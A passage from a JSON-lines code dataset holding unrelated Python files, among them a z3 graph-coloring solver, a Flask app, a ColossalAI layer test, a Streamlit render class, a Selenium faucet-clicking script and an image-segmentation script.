k=k+len(list1)-(i+1)+1\n else:\n s=s+len(list1)-(i+1)+1\nprint('\"kelvin count:\"',k,'\"\\nStaurt count:\"',s)\nif k>s:\n print('Kelvin:',k)\nelif s>k:\n print('sruart:',s)\nelse:\n print('Draw')\n \n \n\n","sub_path":"AboutGame.py","file_name":"AboutGame.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"570727515","text":"import sqlite3\nfrom tkinter import *\nfrom tkinter import messagebox as MessageBox\nfrom tkinter import simpledialog as SimpleDialog\n \ndef crear_db():\n \n conexion = sqlite3.connect('Menu_del_dia.db')\n cursor = conexion.cursor()\n try:\n cursor.execute('''\n CREATE TABLE categoria(\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n nombre VARCHAR(100) UNIQUE NOT NULL\n )\n ''')\n except sqlite3.OperationalError:\n print(\"La Tabla de categoria ya existe\")\n\n\n try:\n cursor.execute('''\n CREATE TABLE plato(\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n nombre VARCHAR(100) UNIQUE NOT NULL,\n categoria_id INTEGER NOT NULL,\n menu INTEGER DEFAULT 0,\n FOREIGN KEY(categoria_id) REFERENCES categoria(id)\n )\n ''')\n except sqlite3.OperationalError:\n print(\"La Tabla de Platos ya existe\")\n \n\n conexion.close()\n\n\n\n\ncrear_db() \n\n\n\n\n\n","sub_path":"projectos/Gestor restaurante/funcionalidad.py","file_name":"funcionalidad.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"523600893","text":"\n# functions for constructing a z3 cnf formula (a \"solver\") for\n# the 3-colorability problem.\n\nfrom z3 import *\nimport random\nfrom timeit import default_timer as timer\n\n\ncolors = [\"R\", \"G\", \"B\"]\n\n# two graphs g1 (3-colorable) and g2 (not 3-colorable)\n# Note: \"edge-list\" representation used\n\ng1 = [[\"a\", \"b\"],\n [\"a\", \"c\"],\n [\"a\", \"d\"],\n [\"a\", \"e\"],\n [\"b\", \"c\"],\n [\"c\", \"d\"],\n [\"d\", \"e\"],\n [\"e\", \"b\"]\n ]\n\ng2 = [[\"a\", \"b\"],\n [\"a\", \"c\"],\n [\"a\", \"d\"],\n [\"a\", \"e\"],\n [\"a\", \"f\"],\n [\"b\", \"c\"],\n [\"c\", \"d\"],\n [\"d\", \"e\"],\n [\"e\", \"f\"],\n [\"f\", \"b\"]\n ]\n\ndef gen_graph(nnodes, nedges):\n edges = []\n\n eset = set()\n\n while nedges >= 0:\n v = random.randint(1,nnodes)\n if v > 1:\n u = random.randint(1,v-1);\n ustr = \"v\" + str(u)\n vstr = \"v\" + str(v)\n estr = ustr + vstr\n if estr not in eset:\n edges += [[ustr, vstr]]\n nedges -= 1\n eset.add(estr)\n return edges\n\n# takes a list of z3 bool variables and generates a list of\n# clauses (for CNF) which are all true iff exactly one of the\n# variables is set to true\n# (handy little utility!)\ndef exactly_one(vars):\n clauses = [vars] # at least one of the literals is true\n # Now encode no more than one literal is true.\n # Hint: there is no pair of literals such that both are true.\n for i in range(len(vars)):\n for j in range(i+1, len(vars)):\n # xi->!xj\n clauses += [[Not(vars[i]), Not(vars[j])]]\n return clauses\n\n\n# takes an edge-list representation of a graph and\n# returns a list of distinct vertices\ndef nodes(graph):\n nset = set()\n nlist = []\n\n for [u, v] in graph:\n if u not in nset:\n nlist += [u]\n nset.add(u)\n if v not in nset:\n nlist += [v]\n nset.add(v)\n # could have just returned the set...\n return nlist\n\n\n# generates a two-level dictionary:\n# vars[][] -> z3-variable\n# example: vars[\"u\"][\"G\"] is the \"green\" indicator variable\n# for vertex \"u\"\ndef variables(nodes):\n vars = {}\n for u in nodes:\n vars[u] = {}\n vars[u][\"R\"] = Bool(u + \"R\")\n vars[u][\"G\"] = Bool(u + \"G\")\n vars[u][\"B\"] = Bool(u + \"B\")\n return vars\n\n# generates the formula (\"solver\") which is satisfiable iff the\n# given graph is 3-colorable\ndef formula(graph):\n f = Solver()\n vars = variables(nodes(graph))\n\n # for each vertex u, generate clauses enforcing that\n # in any satisfying truth assignment, exactly one of\n # the three associated indicator variables (RGB) is\n # true (indicating the color assigned to u)\n for u in vars:\n uclauses = exactly_one([vars[u][\"R\"], vars[u][\"G\"], vars[u][\"B\"] ])\n for c in uclauses:\n f.add(Or(c))\n\n for [u, v] in graph:\n for c in colors:\n f.add(Or([ Not(vars[u][c]), Not(vars[v][c])]))\n return f\n\ndef run_exp(nnodes, nedges):\n g = gen_graph(nnodes, nedges)\n\n start = timer()\n\n f = formula(g)\n ans = f.check()\n\n f = formula(g)\n ans = f.check()\n\n f = formula(g)\n ans = f.check()\n\n f = formula(g)\n ans = f.check()\n\n f = formula(g)\n ans = f.check()\n\n end = timer()\n\n print(\"|V|=\" + str(nnodes) + \"; |E|=\" + str(nedges) +\n \"; ans=\" + str(ans) + \"; time=\" + str((end-start)/5.0))\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"298915445","text":"# Copyright 2017 Netflix, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport ast\nimport re\n\nfrom setuptools import find_packages, setup\n\nwith open(\"requirements.in\") as f:\n REQUIRED = f.read().splitlines()\n\n_version_re = re.compile(r\"__version__\\s+=\\s+(.*)\")\nwith open(\"repokid/__init__.py\", \"rb\") as f:\n REPOKID_VERSION = str(\n ast.literal_eval(_version_re.search(f.read().decode(\"utf-8\")).group(1))\n )\n\nsetup(\n name=\"repokid\",\n version=REPOKID_VERSION,\n description=\"AWS Least Privilege for Distributed, High-Velocity Deployment\",\n # removed as I think getting long_desc to work is perhaps outside the scope\n # of this PR, other long_desc's I've seen have used .rst to display on\n # Pypi, so I think that may be necessary also.\n # long_description=open(\"readme.md\").read(),\n url=\"https://github.com/Netflix/repokid\",\n packages=find_packages(),\n install_requires=REQUIRED,\n keywords=[\"aws\", \"iam\", \"access_advisor\"],\n entry_points={\n \"console_scripts\": [\n \"repokid = repokid.cli.repokid_cli:main\",\n \"dispatcher = repokid.cli.dispatcher_cli:main\",\n ]\n },\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: System Administrators\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Natural Language :: English\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python :: 3.7\",\n \"Topic :: Security\",\n \"Topic :: System\",\n \"Topic :: System :: Systems Administration\",\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"440144917","text":"# (c) Copyright 2009 Cloudera, Inc.\n#\n# AllTests for the stitch project\n\nimport sys\nimport unittest\n\nimport stitch.targets.packagetargettest as packagetargettest\n\ndef testSuite():\n dir_comp_suite = unittest.makeSuite(packagetargettest.CopyDirTest, 'test')\n\n alltests = unittest.TestSuite([dir_comp_suite,\n ])\n return alltests\n\nif __name__ == \"__main__\":\n runner = unittest.TextTestRunner()\n sys.exit(not runner.run(testSuite()).wasSuccessful())\n","sub_path":"src/stitch/alltests.py","file_name":"alltests.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"626332983","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By \nfrom selenium.common.exceptions import NoSuchElementException \nfrom selenium.webdriver.support.ui import WebDriverWait\nimport time\nfrom datetime import datetime\n\n\n# PATH where driver is saved\nPATH = \"C:\\Program Files (x86)\\chromedriver\"\n\ndriver = webdriver.Chrome(PATH)\ndriver.get(\"https://foobar.protonchain.com/\")\n\n\n\nconnect_wallet = driver.find_element(By.XPATH, '//button[text()=\"Connect Wallet\"]')\nconnect_wallet.click()\nprint(connect_wallet)\ntime.sleep(5)\n\n# CLick connect wallet\npro = driver.find_element_by_xpath(\"/html/body/div[3]/div/div[1]/div[2]/ul/li[1]/span\")\npro.click()\n\n# Wait for 15 sec - Time to scan the code and accept the popup in proton app\ntime.sleep(15) \n\nnumber = 1\n\n# For the first time, Get tokens will be clicked\n\ntoken = driver.find_element(By.XPATH, '//button[text()=\"Get tokens\"]')\ntoken.click()\nsleep_time=3610\nwhile True:\n now = datetime.now()\n current_time = now.strftime(\"%H:%M:%S\")\n print(\"Inside Loop: Try \" , number, \" time = \" , current_time )\n print(\"Sleeping for: \", sleep_time , \"s\")\n \n time.sleep(sleep_time)\n number = number+1\n # After inital click on Get tokens, Success button will be clicked every hour\n token_success = driver.find_element(By.XPATH, '//button[text()=\"Success!\"]')\n token_success.click()\n","sub_path":"foobar.py","file_name":"foobar.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"578484806","text":"import interface\nimport streamlit as st\nimport workflows.general.analysis as ann\nfrom missionbio.h5.constants import CHROM\nfrom missionbio.mosaic.constants import GENE_NAME\nfrom segment import track\n\n\nclass Render:\n \"\"\"\n The function of this class to read the arguments\n from the Argument class and create an appropriate\n GUI for them. It must also provide feedback to the\n Compute class as to whether the step is to be\n processed or not.\n \"\"\"\n\n def __init__(self, arguments):\n self.arguments = arguments\n\n def preprocess(self):\n args = self.arguments\n with st.sidebar.expander(\"Preprocessing\"):\n interface.info(f\"{len(args.ids)} features available\")\n\n form = st.form(\"Preprocessing form\")\n args.min_cells = form.slider(\"Minimum cells with amplicon (%)\", min_value=0, max_value=100, value=int(args.get(\"min_cells\")))\n\n args.drop_genes = form.multiselect(\"Genes to drop\", args.all_genes)\n args.keep_genes = form.multiselect(\"Genes to keep\", args.all_genes)\n\n clicked = form.form_submit_button(\"Process\")\n\n if args.keep_genes and args.drop_genes:\n interface.error(\"Only one of keep or drop genes can be selected.\")\n\n return clicked\n\n def prepare(self):\n args = self.arguments\n assay = ann.data.sample.cnv\n\n with st.sidebar.expander(\"Data preparation\", expanded=True):\n info = st.empty()\n\n LABELS = ann.data.available_labels(args.DNA_LABEL)\n args.ploidy_assay = st.selectbox(\"Reference assay\", LABELS)\n\n clones = ann.data.get_labels(assay, args.ploidy_assay)\n clones = list(set(clones))\n\n form = st.form(\"Data Preparation form\")\n args.diploid_cells = form.selectbox(\"Diploid cells\", clones)\n\n clicked = form.form_submit_button(\"Prepare\")\n\n interface.info(f\"Ploidy calculation is performed by normalizing against cluster {args.diploid_cells} of {args.ploidy_assay}.\", info)\n\n return clicked\n\n def layout(self):\n\n args = self.arguments\n\n VISUALS = [[1, 1, 4], [args.HEATMAP, args.LINEPLOT]]\n\n kind = args.visual_type\n options = VISUALS[1]\n column_sizes = VISUALS[0]\n\n columns = st.columns(column_sizes)\n for i in range(len(options)):\n with columns[i]:\n clicked = st.button(options[i], key=f\"visual-{options[i]}\")\n if clicked:\n kind = options[i]\n track(f\"Plot {kind} clicked\")\n args.visual_type = kind\n\n columns = st.columns([0.75, 0.1, 2])\n with columns[0]:\n st.caption(\"---\")\n\n args.args_container = columns[0]\n args.plot_container = columns[2]\n\n def visual_arguments(self):\n\n args = self.arguments\n assay = ann.data.sample.cnv\n\n SPLITBY = ann.data.available_labels(args.ploidy_assay) + args.SPLITBY\n\n kind = args.visual_type\n\n with args.args_container:\n if kind == args.HEATMAP:\n args.fig_attribute = st.selectbox(\"Attribute\", args.LAYERS, key=\"Visualization Attribute\")\n args.splitby = st.selectbox(\"Group by on Y-axis\", SPLITBY)\n args.fig_features = st.selectbox(\"Choose X-axis\", args.FEATURES, key=\"Visualization features\")\n\n if args.fig_features == args.POSITIONS:\n subfeats = sorted(list(set(assay.col_attrs[CHROM])))\n elif args.fig_features == args.GENES:\n subfeats = sorted(list(set(assay.col_attrs[GENE_NAME])))\n\n args.select_features = st.multiselect(\"Filter X-axis data\", subfeats, key=\"Visualization subfeatures\")\n args.cluster_heatmap = st.checkbox(\"Cluster within labels\", True)\n args.convolve = st.slider(\"Smoothing\", 0, 100)\n\n elif kind == args.LINEPLOT:\n clones = ann.data.get_labels(assay, args.get(\"ploidy_assay\"))\n clones = list(set(clones))\n args.clone = st.selectbox(\"Clone\", clones)\n args.collapse = st.checkbox(\"Collapse to gene\", False)\n\n def visual(self):\n\n args = self.arguments\n\n with args.plot_container:\n\n if args.fig is not None:\n args.fig.update_layout(plot_bgcolor=\"rgba(0,0,0,0)\")\n st.plotly_chart(args.fig)\n","sub_path":"src/insights/workflows/cnv/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":4444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"463641101","text":"# To change this license header, choose License Headers in Project Properties.\n# To change this template file, choose Tools | Templates\n# and open the template in the editor.\n\n__author__ = \"andrej\"\n__date__ = \"$Jun 8, 2015 9:49:09 PM$\"\n\nimport os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '..'))\n\nfrom werkzeug import secure_filename\nfrom flask import Flask, request, redirect, url_for\nfrom flask import render_template\n\nimport global_config\nfrom shared.cache import DefaultCache\nfrom data.source.nhlreference_source import NHLRefDataSource\nfrom api.webapi import webapi\nfrom api.admin import webapi_admin\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nh = logging.StreamHandler()\nh.setLevel(logging.INFO)\n\nl = logging.getLogger()\nl.setLevel(logging.INFO)\nl.addHandler(h)\n\napp = Flask(__name__)\napp.config.from_object('nhlpredictor.webapp.config.DevelopmentConfig')\napp.logger.addHandler(h)\n\napp.register_blueprint(webapi)\napp.register_blueprint(webapi_admin)\n\nALLOWED_EXTENSIONS = set(['csv'])\n\ndata_source = NHLRefDataSource(dict(sub_data_url=global_config.MINER['sub_data_url'],\n base_url=global_config.MINER['base_url']),\n cache=DefaultCache.get_instance())\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n \n@app.route('/', methods=['GET'])\ndef index():\n return render_template('index.html')\n\n@app.route('/predictfile', methods=['GET', 'POST'])\n@app.route('/predictfile/', methods=['GET', 'POST'])\ndef predictfile():\n if request.method == 'POST':\n file = request.files['file']\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n return redirect(url_for('uploaded_file', filename=filename))\n return render_template('uploadcsv.html')\n","sub_path":"nhlpredictor/webapp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"170975999","text":"from contextlib import nullcontext\n\nimport torch\nimport torch.distributed as dist\nimport torch.nn as nn\nfrom torch.testing import assert_close\n\nimport colossalai\nfrom colossalai.lazy import LazyInitContext\nfrom colossalai.shardformer.layer import GPT2FusedLinearConv1D_Col, GPT2FusedLinearConv1D_Row\nfrom colossalai.shardformer.layer.qkv_fused_linear import split_fused_qkv_in_gpt2_style\nfrom colossalai.testing import parameterize, rerun_if_address_is_in_use, spawn\n\n\n# This code is copied from https://github.com/huggingface/transformers\nclass Conv1D(nn.Module):\n \"\"\"\n 1D-convolutional layer as defined by Radford et al. for OpenAI GPT (and also used in GPT-2).\n\n Basically works like a linear layer but the weights are transposed.\n\n Args:\n nf (`int`): The number of output features.\n nx (`int`): The number of input features.\n \"\"\"\n\n def __init__(self, nf, nx):\n super().__init__()\n self.nf = nf\n self.weight = nn.Parameter(torch.empty(nx, nf))\n self.bias = nn.Parameter(torch.zeros(nf))\n nn.init.normal_(self.weight, std=0.02)\n\n def forward(self, x):\n size_out = x.size()[:-1] + (self.nf,)\n x = torch.addmm(self.bias, x.view(-1, x.size(-1)), self.weight)\n x = x.view(size_out)\n return x\n\n\ndef rearrange(tensor: torch.Tensor, dim: int):\n tensor = tensor.clone()\n world_size = 2\n order = torch.arange(world_size * 3)\n new_order = []\n for i in range(world_size):\n new_order.append(order[i::world_size])\n new_order = torch.cat(new_order)\n\n tensor_chunks = torch.chunk(tensor, world_size * 3, dim=dim)\n rearanged_tensor_chunks = [tensor_chunks[i] for i in new_order]\n rearanged_tensor = torch.cat(rearanged_tensor_chunks, dim=dim)\n return rearanged_tensor\n\n\n@parameterize('lazy_init', [False, True])\ndef check_linear_conv_1d_col(lazy_init: bool):\n ctx = LazyInitContext() if lazy_init else nullcontext()\n linear = Conv1D(192, 48).cuda()\n with ctx:\n linear_copy = Conv1D(192, 48).cuda()\n linear_conv_col = GPT2FusedLinearConv1D_Col.from_native_module(linear_copy,\n process_group=None,\n gather_output=True,\n n_fused=3)\n\n assert linear.weight.shape == torch.Size([48, 192])\n assert linear.bias.shape == torch.Size([192])\n assert linear_conv_col.weight.shape == torch.Size([48, 96])\n assert linear_conv_col.bias.shape == torch.Size([96])\n assert linear_copy.weight is linear_conv_col.weight\n assert linear_copy.bias is linear_conv_col.bias\n\n # ensure weights are reversibly loadable\n linear_conv_col.load_state_dict(linear.state_dict())\n linear.load_state_dict(linear_conv_col.state_dict())\n\n # check computation correctness\n x = torch.rand(4, 48).cuda()\n out = linear(x)\n gather_out = linear_conv_col(x)\n assert_close(rearrange(out, 1), gather_out)\n\n # check backward correctness\n out.sum().backward()\n gather_out.sum().backward()\n\n target_grad = split_fused_qkv_in_gpt2_style(linear.weight.grad, 3, None, True)\n assert_close(target_grad, linear_conv_col.weight.grad)\n\n\n@parameterize('lazy_init', [False, True])\ndef check_linear_conv_1d_row(lazy_init: bool):\n ctx = LazyInitContext() if lazy_init else nullcontext()\n\n linear = Conv1D(192, 48).cuda()\n with ctx:\n linear_copy = Conv1D(192, 48).cuda()\n linear_row = GPT2FusedLinearConv1D_Row.from_native_module(linear_copy, process_group=None, parallel_input=False)\n\n assert linear.weight.shape == torch.Size([48, 192])\n assert linear_row.weight.shape == torch.Size([24, 192])\n assert linear_row.bias.shape == torch.Size([192])\n assert linear_copy.weight is linear_row.weight\n assert linear_copy.bias is linear_row.bias\n\n # ensure weights are reversibly loadable\n linear_row.load_state_dict(linear.state_dict())\n linear.load_state_dict(linear_row.state_dict())\n\n # check computation correctness\n x = torch.rand(4, 48).cuda()\n out = linear(x)\n gather_out = linear_row(x)\n assert_close(out, gather_out)\n\n # check backward correctness\n out.sum().backward()\n gather_out.sum().backward()\n\n rank = dist.get_rank()\n target_grad = torch.chunk(linear.weight.grad, 2, dim=0)[rank]\n assert_close(target_grad, linear_row.weight.grad)\n\n\ndef run_dist(rank, world_size, port):\n colossalai.launch(config={}, rank=rank, world_size=world_size, host='localhost', port=port, backend='nccl')\n\n # test for linear conv\n check_linear_conv_1d_col()\n check_linear_conv_1d_row()\n\n\n@rerun_if_address_is_in_use()\ndef test_linearconv():\n spawn(run_dist, nprocs=2)\n\n\nif __name__ == '__main__':\n test_linearconv()\n","sub_path":"tests/test_shardformer/test_layer/test_qkv_fused_linear_1d.py","file_name":"test_qkv_fused_linear_1d.py","file_ext":"py","file_size_in_byte":4827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"645089695","text":"\ndef sum_digit(number):\n return sum([int(i) for i in str(number)])\n\n\ndef main():\n max_sum = 0\n for a in range(1, 100):\n for b in range(1, 100):\n _sum = sum_digit(a**b)\n\n if _sum > max_sum:\n max_sum = _sum\n return max_sum\n\nif __name__ == '__main__':\n print(main())\n","sub_path":"python35/solutions/Problem056.py","file_name":"Problem056.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"350291710","text":"from pyramid import testing\nfrom webob.multidict import MultiDict\nfrom sqlalchemy import func\n\nfrom . import BaseTest\nfrom beerio2.models import User, Product, PurchaseProduct, PurchaseProduct\n\nclass TestBasicDatabaseInvariants(BaseTest):\n\n def test_users(self):\n active_users = self.session.query(User).filter(User.active).count()\n inactive_users = self.session.query(User).filter(~User.active).count()\n\n assert active_users <= 15\n assert inactive_users > 0\n\n def test_money(self):\n for user in self.session.query(User).all():\n balance_receipts = sum([r.amount_balance for r in user.receipts])\n sell_prices = sum([s.price for s in user.sells])\n guarantee_receipts = sum([r.amount_guarantee for r in user.receipts])\n\n assert user.balance == balance_receipts - sell_prices\n assert user.guarantee == guarantee_receipts \n\n def test_products(self):\n products = self.session.query(Product).all()\n assert len(products) == 8\n\n def test_purchases(self):\n total_bottles, total_crates = self.session.query(\n func.sum(PurchaseProduct.num_bottles),\n func.sum(PurchaseProduct.num_crates),\n ).one()\n assert total_bottles == 44\n assert total_crates == 6\n\n def test_form_fail(self):\n from ..views.default import my_view\n request = testing.DummyRequest(dbsession=self.session, post=MultiDict())\n info = my_view(request)\n assert not info['form'].validate()\n\n def test_form_okay(self):\n from ..views.default import my_view\n request = testing.DummyRequest(\n dbsession=self.session,\n post=MultiDict([\n ('name', 'Asdf'),\n ('company', ''),\n ('volume_ml', '500'),\n ]),\n )\n form = my_view(request)['form']\n assert form.validate(), form.errors\n assert form.data['volume_ml'] == 500\n","sub_path":"beerio2/tests/basics.py","file_name":"basics.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"431317040","text":"\"\"\"\nPython Assignment\nDate : 2018-06-23\nAuthor : Hyunwook Kim\n\nProblem 9. Multiple Total Score\nCompute total scores for inputted score.\n\"\"\"\n\n\nscore_str = input(\"Score: \").split(', ')\nscore_sum = 0\nfor i in range(len(score_str)):\n score_sum += int(score_str[i])\n\nprint(\"Total Score:\", score_sum)\n","sub_path":"chapter00/python_files/pyas09.py","file_name":"pyas09.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"447056773","text":"\n\nfrom xai.brain.wordbase.nouns._wake import _WAKE\n\n#calss header\nclass _WAKED(_WAKE, ):\n\tdef __init__(self,): \n\t\t_WAKE.__init__(self)\n\t\tself.name = \"WAKED\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"wake\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_waked.py","file_name":"_waked.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"222158542","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri May 25 19:34:53 2018\r\n\r\n@author: Liz\r\n\"\"\"\r\n#--AGREGAR AL CÓDIGO ORIGINAL--\r\nfrom skimage.feature import peak_local_max,canny\r\nfrom skimage.feature import match_template\r\nfrom skimage.io import imread\r\nfrom skimage.color import rgb2gray\r\n\r\n#from skimage.transform import resize\r\nfrom skimage.filters.thresholding import threshold_otsu\r\nfrom skimage.exposure import rescale_intensity\r\n \r\n # In[]\r\nplt.close('all')\r\ngen = 'Imagenes/'\r\nfolder_ids = os.listdir(gen)\r\n#ID's de las imágenes\r\nimage_ids = list()\r\n\r\n#t_name = 'template1'#Nombre del template a usar\r\nr = 50 #radio de referencia\r\nr_pozo = 110 #radio del pozo\r\ntemplate = circle(r)\r\n\r\n#Creacíon de una matriz que contenga todos los ids, donde por cada fila hay 1 carpeta.\r\nfor i in range(0,len(folder_ids)):\r\n image_ids.insert(i, os.listdir(gen + folder_ids[i] + '/') ) \r\n#for i in range(0,len(folder_ids)):\r\ni = 2#número del folder\r\nfor j in range(0,len(image_ids[i][:])):\r\n PATH = gen + folder_ids[i] + '/' + image_ids[i][j]\r\n I = imread(PATH)\r\n I_gray = rgb2gray(I)\r\n I_edges = canny(I_gray,sigma=0.05)\r\n coord = corr2d(I_edges,template,folder_ids[i],image_ids[i][j],j,r_pozo)\r\n I_gray = rescale_intensity(I_gray,in_range=(0.1,0.8))\r\n m = np.shape(I_gray)\r\n I_final = np.ones([m[0],m[1]])\r\n for k in range(0,len(coord)):\r\n# k = 0\r\n I_crop = pozos(I_gray,coord[k],r_pozo)\r\n I_otsu = otsu(I_crop,coord[k],r_pozo)\r\n I_final = I_final * I_otsu\r\n fig = plt.figure()\r\n ax1 = fig.add_subplot(111)\r\n ax1.axis('off')\r\n ax1.imshow(I_final,cmap='gray')\r\n fig.savefig('Resultados_otsu/' + folder_ids[i] + '/' + image_ids[i][j])\r\n#for i in [3,5]:\r\n##i = 1#número del folder\r\n# for j in range(0,len(image_ids[i][:])):\r\n# PATH = gen + folder_ids[i] + '/' + image_ids[i][j]\r\n# # offset = 150\r\n# I = imread(PATH)\r\n# I_gray = rgb2gray(I)\r\n# coord = corr2d(I_gray,t_name,folder_ids[i],image_ids[i][j],j)\r\n\r\n#template = imread(t_name + '.png')\r\n#template_g = rgb2gray(template) \r\n \r\n#PATH = gen + folder_ids[0] + '/' + image_ids[0][7]\r\n#I = imread(PATH)\r\n#I_gray = rgb2gray(I)\r\n#print(np.mean(I_gray[:]))\r\n#I_gray = I_gray - np.mean(I_gray)\r\n# In[]\r\nPATH = gen + folder_ids[1] + '/' + image_ids[1][0]\r\nI = imread(PATH)\r\nI_gray = rgb2gray(I) \r\nI_edges = canny(I_gray,sigma=0.05)\r\ncoord = corr2d(I_edges,template,folder_ids[1],image_ids[1][0],0,r_pozo)\r\nI_gray = rescale_intensity(I_gray,in_range=(0.2,0.8))\r\nm = np.shape(I_gray)\r\nI_final = np.ones([m[0],m[1]])\r\nfor k in range(0,len(coord)):\r\n I_crop = pozos(I_gray,coord[k],r_pozo)\r\n I_otsu = otsu(I_crop,coord[k],r_pozo)\r\n I_final = I_final * I_otsu\r\nfig = plt.figure()\r\nax1 = fig.add_subplot(111)\r\nax1.axis('off')\r\nax1.imshow(I_final,cmap='gray')\r\n# In[] \r\ndef otsu(I_gray,centro,r):\r\n I = I_gray[(centro[1]-r):(centro[1]+r),(centro[0]-r):(centro[0]+r)]\r\n prom = np.mean(I)\r\n thresh = threshold_otsu(I)*prom\r\n BW = I_gray > thresh\r\n BW = 1 - BW\r\n return BW \r\n \r\n \r\n# In[] Correlación cruzada normalizada de skimage\r\n#template = imread('template_re2.png')\r\n#template_g = rgb2gray(template)\r\n#template_g = template_g - np.mean(template_g)\r\n#result = match_template(I_gray,template_g,pad_input = True)\r\n###máximos locales de la correlación cruzada para encontrar otras coincidencias\r\n#coordinates = peak_local_max(result, min_distance=125)\r\n##\r\n#fig, (ax_orig, ax_template, ax_corr) = plt.subplots(1, 3)\r\n#ax_orig.imshow(I_gray, cmap='gray')\r\n#ax_orig.set_title('Original')\r\n#ax_orig.set_axis_off()\r\n#ax_template.imshow(template_g, cmap='gray')\r\n#ax_template.set_title('Template')\r\n#ax_template.set_axis_off()\r\n#ax_corr.imshow(result, cmap='gray')\r\n#ax_corr.set_title('Correlación cruzada')\r\n#ax_corr.set_axis_off()\r\n#for i in range(0,len(coordinates)):\r\n# ax_orig.plot(coordinates[i,1], coordinates[i,0], 'ro')\r\n#fig.show()\r\n \r\n \r\n#--Entrada: Imagen en escala de grises I_gray y template para hacer la\r\n#@@ -86,46 +93,46 @@\r\n #Guarda las imágenes qué dieron como resultado del template empleado en la\r\n # la dirección Resultados_template/nombre_folder/nombre_imagen\r\n \r\n#def corr2d(I_gray,t_name,folder,name,ind):\r\n# template = imread(t_name + '.png')\r\n# template_g = rgb2gray(template)\r\ndef corr2d(BW,template,folder,name,ind,r_pozo):\r\n result = match_template(I_edges,template,pad_input = True)\r\n coordinates = peak_local_max(result, min_distance=160)#centro del pequeño \r\n if coordinates[0][1] < coordinates[1][1]:\r\n y = coordinates[0][0]-r_pozo\r\n x = coordinates[0][1]+r_pozo\r\n else:\r\n y = coordinates[1][0]-r_pozo\r\n x = coordinates[1][1]+r_pozo\r\n #coordenadas de los otros pozos por simetría\r\n centros = [[x,y],[x,y+2*r_pozo]]\r\n for i in range(0,2):\r\n centros.append([centros[i][0] + 2*r_pozo,centros[i][1] ])\r\n centros.append([centros[i][0] - 2*r_pozo,centros[i][1] ])\r\n\r\n centros = sorted(centros)\r\n# fig, (ax_orig, ax_template, ax_corr) = plt.subplots(1, 3)\r\n# fig = plt.figure()\r\n# ax_orig = fig.add_subplot(111)\r\n## ax_orig.imshow(I_gray, cmap='gray')\r\n# ax_orig.imshow(BW, cmap='gray')\r\n# ax_orig.set_title('Original')\r\n# ax_orig.set_axis_off()\r\n## ax_template.imshow(template, cmap='gray')\r\n## ax_template.set_title('Template')\r\n## ax_template.set_axis_off()\r\n## ax_corr.imshow(result, cmap='gray')\r\n## ax_corr.set_title('Correlación cruzada')\r\n## ax_corr.set_axis_off()\r\n## for i in range(0,len(coordinates)):\r\n## ax_orig.plot(coordinates[i,1], coordinates[i,0], 'ro')\r\n# for i in range(0,len(centros)):\r\n# ax_orig.plot(centros[i][0],centros[i][1],'ro')\r\n# fig.show() \r\n# fig.savefig('Resultados_template/' + folder + '/' + name)\r\n# fig.savefig('Resultados_template/' + t_name + '/' + folder + '/' + name)\r\n return centros\r\n \r\n#coord = corr2d(edges,template,folder_ids[0],image_ids[0][7],7)\r\n# In[] Seccionamiento por medio de distancia euclideana\r\n#I_gray = rgb2gray(I)\r\n#I_new = 